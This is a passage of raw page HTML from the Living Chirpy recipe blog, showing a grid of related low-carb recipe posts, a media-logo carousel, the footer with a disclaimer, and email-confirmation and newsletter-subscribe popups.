src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20768%20576'%3E%3C/svg%3E" class="attachment-medium_large size-medium_large" alt="" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-150x112.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs.jpg 850w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-768x576.jpg" /><noscript><img width="768" height="576" src="https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-768x576.jpg" class="attachment-medium_large size-medium_large" alt="" srcset="https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-150x112.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/09/Chicken-Zucchini-Meatballs.jpg 850w" sizes="(max-width: 768px) 100vw, 768px" /></noscript></div> </a><div class="elementor-post__text"><h3 class="elementor-post__title"> <a href="https://www.livingchirpy.com/chicken-zucchini-meatballs/"> Chicken Zucchini Meatballs [Paleo, Whole 30, Low-Carb, Keto] </a></h3></div></article><article class="elementor-post elementor-grid-item post-3105 post type-post status-publish format-standard has-post-thumbnail hentry category-diet category-featured category-fish-seafood category-glutenfree category-lowcarb-keto category-main-meals category-recipes category-soup-chili-stew category-top-25 tag-lobster"> <a class="elementor-post__thumbnail__link" href="https://www.livingchirpy.com/rustic-lobster-bisque/"><div class="elementor-post__thumbnail"><img width="768" height="576" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20768%20576'%3E%3C/svg%3E" class="attachment-medium_large size-medium_large" alt="Rustic Lobster Bisque" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-150x113.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-696x522.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-560x420.jpg 560w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-768x576.jpg" /><noscript><img width="768" height="576" src="https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-768x576.jpg" class="attachment-medium_large size-medium_large" alt="Rustic Lobster Bisque" srcset="https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-150x113.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-696x522.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-560x420.jpg 560w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Lobster-Bisque-Thumb.jpg 800w" sizes="(max-width: 768px) 100vw, 768px" /></noscript></div> </a><div class="elementor-post__text"><h3 class="elementor-post__title"> <a href="https://www.livingchirpy.com/rustic-lobster-bisque/"> Creamy Rustic Lobster Bisque </a></h3></div></article><article class="elementor-post elementor-grid-item post-2931 post type-post status-publish format-standard has-post-thumbnail hentry category-chicken category-diet category-featured category-glutenfree category-lowcarb-keto category-main-meals category-recipes category-top-25 tag-black-beans tag-chicken tag-lettuce tag-pico-de-gallo tag-shredded tag-sour-cream"> <a class="elementor-post__thumbnail__link" href="https://www.livingchirpy.com/low-carb-shredded-chicken-tacos/"><div class="elementor-post__thumbnail"><img width="768" height="576" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20768%20576'%3E%3C/svg%3E" class="attachment-medium_large size-medium_large" alt="Low-Carb Shredded Chicken Tacos Thumbnail" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-150x113.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-696x522.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-560x420.jpg 560w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-768x576.jpg" /><noscript><img width="768" height="576" src="https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-768x576.jpg" class="attachment-medium_large size-medium_large" alt="Low-Carb Shredded Chicken Tacos Thumbnail" srcset="https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-768x576.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-150x113.jpg 150w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-300x225.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-80x60.jpg 80w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-265x198.jpg 265w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-696x522.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-560x420.jpg 560w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb-500x375.jpg 500w, https://www.livingchirpy.com/wp-content/uploads/2018/07/Low-Carb-Shredded-Chicken-Tacos-Thumb.jpg 800w" sizes="(max-width: 768px) 100vw, 768px" /></noscript></div> </a><div class="elementor-post__text"><h3 class="elementor-post__title"> <a href="https://www.livingchirpy.com/low-carb-shredded-chicken-tacos/"> Low-Carb Shredded Chicken Tacos </a></h3></div></article><article class="elementor-post elementor-grid-item post-2755 post type-post status-publish format-standard has-post-thumbnail hentry category-featured category-roundups"> <a class="elementor-post__thumbnail__link" href="https://www.livingchirpy.com/10-no-fuss-low-carb-one-pot-meals/"><div class="elementor-post__thumbnail"><img width="768" height="538" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20768%20538'%3E%3C/svg%3E" class="attachment-medium_large size-medium_large" alt="10 No Fuss Low-Carb One-Pot Meals" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-768x538.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-300x210.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-100x70.jpg 100w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-696x487.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-600x420.jpg 600w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb.jpg 800w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-768x538.jpg" /><noscript><img width="768" height="538" src="https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-768x538.jpg" class="attachment-medium_large size-medium_large" alt="10 No Fuss Low-Carb One-Pot Meals" srcset="https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-768x538.jpg 768w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-300x210.jpg 300w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-100x70.jpg 100w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-696x487.jpg 696w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb-600x420.jpg 600w, https://www.livingchirpy.com/wp-content/uploads/2016/07/10-no-fuss-low-carb-one-pot-meals-thumb.jpg 800w" sizes="(max-width: 768px) 100vw, 768px" /></noscript></div> </a><div class="elementor-post__text"><h3 class="elementor-post__title"> <a href="https://www.livingchirpy.com/10-no-fuss-low-carb-one-pot-meals/"> 10 No-Fuss Low-Carb One Pot Meals </a></h3></div></article></div></div></div><div class="elementor-element elementor-element-05fbb16 elementor-widget elementor-widget-sidebar" data-id="05fbb16" data-element_type="widget" data-widget_type="sidebar.default"><div class="elementor-widget-container"><aside id="text-29" class="widget widget_text"><div class="textwidget"></div></aside></div></div></div></div></div></div></div></section></div></div></div><div class="swp-content-locator"></div></div></div><div data-elementor-type="footer" data-elementor-id="8479" class="elementor elementor-8479 elementor-location-footer" data-elementor-settings="[]"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-element elementor-element-6e29167f elementor-section-content-middle elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="6e29167f" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-no"><div class="elementor-row"><div class="elementor-element elementor-element-7d186907 elementor-column elementor-col-50 elementor-top-column" data-id="7d186907" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-5918b473 elementor-widget elementor-widget-heading" data-id="5918b473" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h4 class="elementor-heading-title elementor-size-default">Featured On:</h4></div></div></div></div></div><div class="elementor-element elementor-element-2191badd elementor-column elementor-col-50 elementor-top-column" data-id="2191badd" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-e5104f2 elementor-pagination-position-inside elementor-skin-carousel elementor-pagination-type-bullets elementor-widget elementor-widget-media-carousel" data-id="e5104f2" data-element_type="widget" data-settings="{&quot;slides_per_view&quot;:&quot;5&quot;,&quot;space_between&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:25,&quot;sizes&quot;:[]},&quot;slides_per_view_tablet&quot;:&quot;4&quot;,&quot;slides_per_view_mobile&quot;:&quot;3&quot;,&quot;skin&quot;:&quot;carousel&quot;,&quot;effect&quot;:&quot;slide&quot;,&quot;pagination&quot;:&quot;bullets&quot;,&quot;speed&quot;:500,&quot;autoplay&quot;:&quot;yes&quot;,&quot;autoplay_speed&quot;:5000,&quot;loop&quot;:&quot;yes&quot;,&quot;pause_on_interaction&quot;:&quot;yes&quot;,&quot;space_between_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]},&quot;space_between_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:10,&quot;sizes&quot;:[]}}" data-widget_type="media-carousel.default"><div class="elementor-widget-container"><div class="elementor-swiper"><div class="elementor-main-swiper swiper-container"><div class="swiper-wrapper"><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/The-Huffington-Post-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Buzzfeed-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Master-Cook-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Dr-Axe-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Daily-Burn-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Greatist-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Sheknows-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Shape-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/domino-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Parade-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div><div class="swiper-slide"><div data-bg="url(https://www.livingchirpy.com/wp-content/uploads/2018/12/Brit-Co-1.jpg)" class="elementor-carousel-image rocket-lazyload" style=""></div></div></div><div class="swiper-pagination"></div></div></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-237ce753 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-id="237ce753" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-75cf350b elementor-column elementor-col-25 elementor-top-column" data-id="75cf350b" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-620ea9f elementor-widget elementor-widget-theme-site-logo elementor-widget-image" data-id="620ea9f" data-element_type="widget" data-widget_type="theme-site-logo.default"><div class="elementor-widget-container"><div class="elementor-image"> <a href="https://www.livingchirpy.com" data-elementor-open-lightbox=""> <img width="490" height="343" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20490%20343'%3E%3C/svg%3E" class="attachment-full size-full" alt="" data-lazy-srcset="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2.png 490w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-150x105.png 150w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-300x210.png 300w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png 152w" data-lazy-sizes="(max-width: 490px) 100vw, 490px" data-lazy-src="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png" /><noscript><img width="490" height="343" src="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png" class="attachment-full size-full" alt="" srcset="https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2.png 490w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-150x105.png 150w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-300x210.png 300w, https://www.livingchirpy.com/wp-content/uploads/2018/10/LIVING-CHIRPY-Logo-2018-2-152x106.png 152w" sizes="(max-width: 490px) 100vw, 490px" /></noscript> </a></div></div></div><div class="elementor-element elementor-element-375a7326 elementor-shape-rounded elementor-widget elementor-widget-social-icons" data-id="375a7326" data-element_type="widget" data-widget_type="social-icons.default"><div class="elementor-widget-container"><div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook" href="http://facebook.com/livingchirpy/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube" href="https://www.youtube.com/channel/UC-hzyeYBjLgGNBy3SVTZW7w" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fa fa-youtube"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-pinterest" href="http://pinterest.com/livingchirpy" target="_blank"> <span class="elementor-screen-only">Pinterest</span> <i class="fa fa-pinterest"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram" href="http://instagram.com/livingchirpy/" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fa fa-instagram"></i> </a></div></div></div></div></div></div><div class="elementor-element elementor-element-849672d elementor-column elementor-col-25 elementor-top-column" data-id="849672d" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-560b1ff9 elementor-widget elementor-widget-heading" data-id="560b1ff9" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h4 class="elementor-heading-title elementor-size-default">Menu</h4></div></div><div class="elementor-element elementor-element-7dacce96 elementor-icon-list--layout-traditional elementor-widget elementor-widget-icon-list" data-id="7dacce96" data-element_type="widget" data-widget_type="icon-list.default"><div class="elementor-widget-container"><ul class="elementor-icon-list-items"><li class="elementor-icon-list-item" > <a href="https://www.livingchirpy.com/about/"> <span class="elementor-icon-list-text">About Us</span> </a></li><li class="elementor-icon-list-item" > <a href="https://www.livingchirpy.com/contact/"> <span class="elementor-icon-list-text">Get In Touch</span> </a></li><li class="elementor-icon-list-item" > <a href="https://www.livingchirpy.com/privacy-policy/"> <span class="elementor-icon-list-text">Privacy Policy</span> </a></li></ul></div></div></div></div></div><div class="elementor-element elementor-element-1eb952b6 elementor-column elementor-col-25 elementor-top-column" data-id="1eb952b6" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-41f5f254 elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="41f5f254" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h4 class="elementor-heading-title elementor-size-default">Resources</h4></div></div><div class="elementor-element elementor-element-dc65add elementor-mobile-align-right elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-phone elementor-icon-list--layout-traditional elementor-widget elementor-widget-icon-list" data-id="dc65add" data-element_type="widget" data-widget_type="icon-list.default"><div class="elementor-widget-container"><ul class="elementor-icon-list-items"><li class="elementor-icon-list-item" > <span class="elementor-icon-list-text">How to Start a Food Blog</span></li><li class="elementor-icon-list-item" > <span class="elementor-icon-list-text">How to cook great food</span></li><li class="elementor-icon-list-item" > <span class="elementor-icon-list-text">Diets & Eating Healthy</span></li></ul></div></div></div></div></div><div class="elementor-element elementor-element-39917ede elementor-column elementor-col-25 elementor-top-column" data-id="39917ede" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-0815bdc elementor-widget elementor-widget-text-editor" data-id="0815bdc" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p><strong>Living Chirpy Is A Personal Blog.</strong><br />All the information is published in good faith and for general information purpose only. We do not make any warranties about the completeness, reliability and accuracy of this information. Any action you take upon the information you find on this blog, is strictly at your own risk. <strong>Living Chirpy</strong> [livingchirpy.com] will not be liable for any losses and/or damages in connection with the use of our website.<br />*Please note that some posts may contain affiliate links to help cover the maintenance costs of keeping our site running.</p></div></div></div></div></div></div></div></div></section><section class="elementor-element elementor-element-40475629 elementor-section-height-min-height elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-items-middle elementor-section elementor-top-section" data-id="40475629" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-5fce0dfb elementor-column elementor-col-33 elementor-top-column" data-id="5fce0dfb" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-4959264f elementor-widget elementor-widget-heading" data-id="4959264f" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><p class="elementor-heading-title elementor-size-default">Living Chirpy 2015-2019 © All rights reserved</p></div></div></div></div></div><div class="elementor-element elementor-element-68272ac elementor-hidden-desktop elementor-hidden-tablet elementor-hidden-phone elementor-column elementor-col-33 elementor-top-column" data-id="68272ac" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-76e3f77 elementor-widget elementor-widget-heading" data-id="76e3f77" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">AN ELITE CAFEMEDIA FOOD PUBLISHER</h2></div></div></div></div></div><div class="elementor-element elementor-element-60deac8 elementor-column elementor-col-33 elementor-top-column" data-id="60deac8" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-188e1a5 elementor-widget elementor-widget-text-editor" data-id="188e1a5" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p>Powered By The Best: <a href="https://wpxhosting.com/?affid=1914">WPXHosting</a></p></div></div></div></div></div></div></div></div></section></div></div></div></div><div data-elementor-type="popup" data-elementor-id="9216" class="elementor elementor-9216 elementor-bc-flex-widget elementor-location-popup" data-elementor-settings="{&quot;triggers&quot;:[],&quot;timing&quot;:[]}"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-element elementor-element-4adfa01d elementor-section-height-min-height elementor-section-items-stretch elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section elementor-top-section" data-id="4adfa01d" data-element_type="section" data-settings="{&quot;background_background&quot;:&quot;classic&quot;}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-3c72d110 elementor-column elementor-col-100 elementor-top-column" data-id="3c72d110" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-6b8ae0e1 elementor-widget elementor-widget-heading" data-id="6b8ae0e1" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">Hold on! Go check Your Email.</h2></div></div><div class="elementor-element elementor-element-75ab6059 elementor-widget elementor-widget-text-editor" data-id="75ab6059" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p>Before you can receive updates and the exclusive content you’ve requested, <b>you need to go confirm your email address</b>.</p></div></div></div><div class="elementor-element elementor-element-98cfd63 elementor-widget elementor-widget-text-editor" data-id="98cfd63" data-element_type="widget" data-widget_type="text-editor.default"><div class="elementor-widget-container"><div class="elementor-text-editor elementor-clearfix"><p style="text-align: center;"><strong>(Confirming your email address is easy!)</strong></p><ul><li><b>Step 1</b> – Find the email I just sent you.</li><li><b>Step 2</b> – Click the confirmation link in the email.</li><li><b>Step 3</b> – Check your inbox for a welcome email from me, it will have details on how to access the free goodies.</li><li><b>Step 4</b> – To make sure you don’t miss any emails, be sure to whitelist my email address ([email protected]).</li></ul><p style="text-align: left;">If you use Gmail, you could also drag the email into your primary tab.</p><p style="text-align: left;"><b>Need help?</b></p><p style="text-align: left;">Just drop an email to [email protected] 🙂</p><p style="text-align: left;">Talk soon,</p><p style="text-align: left;">Shay</p></div></div></div></div></div></div></div></div></section></div></div></div><div data-elementor-type="popup" data-elementor-id="9202" class="elementor elementor-9202 elementor-bc-flex-widget elementor-location-popup" data-elementor-settings="{&quot;entrance_animation&quot;:&quot;slideInDown&quot;,&quot;close_button_delay&quot;:1,&quot;entrance_animation_duration&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:1.2,&quot;sizes&quot;:[]},&quot;triggers&quot;:{&quot;scrolling&quot;:&quot;yes&quot;,&quot;scrolling_direction&quot;:&quot;down&quot;,&quot;scrolling_offset&quot;:50},&quot;timing&quot;:{&quot;devices&quot;:&quot;yes&quot;,&quot;devices_devices&quot;:[&quot;desktop&quot;,&quot;tablet&quot;,&quot;mobile&quot;]}}"><div class="elementor-inner"><div class="elementor-section-wrap"><section class="elementor-element elementor-element-45c80bb7 elementor-section-height-min-height elementor-section-content-middle elementor-section-stretched elementor-section-full_width elementor-section-height-default elementor-section-items-middle elementor-section elementor-top-section" data-id="45c80bb7" data-element_type="section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;,&quot;sticky&quot;:&quot;top&quot;,&quot;sticky_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;,&quot;mobile&quot;],&quot;sticky_offset&quot;:0,&quot;sticky_effects_offset&quot;:0}"><div class="elementor-container elementor-column-gap-default"><div class="elementor-row"><div class="elementor-element elementor-element-6a4be6ab elementor-column elementor-col-33 elementor-top-column" data-id="6a4be6ab" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-35605558 elementor-widget elementor-widget-heading" data-id="35605558" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">Get Our Latest Recipes +</h2></div></div></div></div></div><div class="elementor-element elementor-element-a975312 elementor-column elementor-col-33 elementor-top-column" data-id="a975312" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-72c9872 elementor-widget elementor-widget-heading" data-id="72c9872" data-element_type="widget" data-widget_type="heading.default"><div class="elementor-widget-container"><h2 class="elementor-heading-title elementor-size-default">FREE Kitchen Conversion Cheat Sheet!</h2></div></div></div></div></div><div class="elementor-element elementor-element-725b66c6 elementor-column elementor-col-33 elementor-top-column" data-id="725b66c6" data-element_type="column"><div class="elementor-column-wrap elementor-element-populated"><div class="elementor-widget-wrap"><div class="elementor-element elementor-element-7aaaffe4 elementor-button-align-stretch elementor-widget elementor-widget-form" data-id="7aaaffe4" data-element_type="widget" data-widget_type="form.default"><div class="elementor-widget-container"><form class="elementor-form" method="post" name="Subscribe"> <input type="hidden" name="post_id" value="9202"/> <input type="hidden" name="form_id" value="7aaaffe4"/><div class="elementor-form-fields-wrapper elementor-labels-"><div class="elementor-field-type-email elementor-field-group elementor-column elementor-field-group-email elementor-col-33 elementor-field-required"> <label for="form-field-email" class="elementor-field-label elementor-screen-only">Email</label><input size="1" type="email" name="form_fields[email]" id="form-field-email" class="elementor-field elementor-size-sm elementor-field-textual" placeholder="Email" required="required" aria-required="true"></div><div class="elementor-field-group elementor-column elementor-field-type-submit elementor-col-33"> <button type="submit" class="elementor-button elementor-size-sm"> <span > <span class="elementor-align-icon-left elementor-button-icon"> <i class="fa fa-bell-o" aria-hidden="true"></i> </span> <span class="elementor-button-text">Subscribe</span> </span> </button></div></div></form></div></div></div></div></div></div></div></section></div></div></div> <script type='text/javascript'>/* <![CDATA[ */ var astra 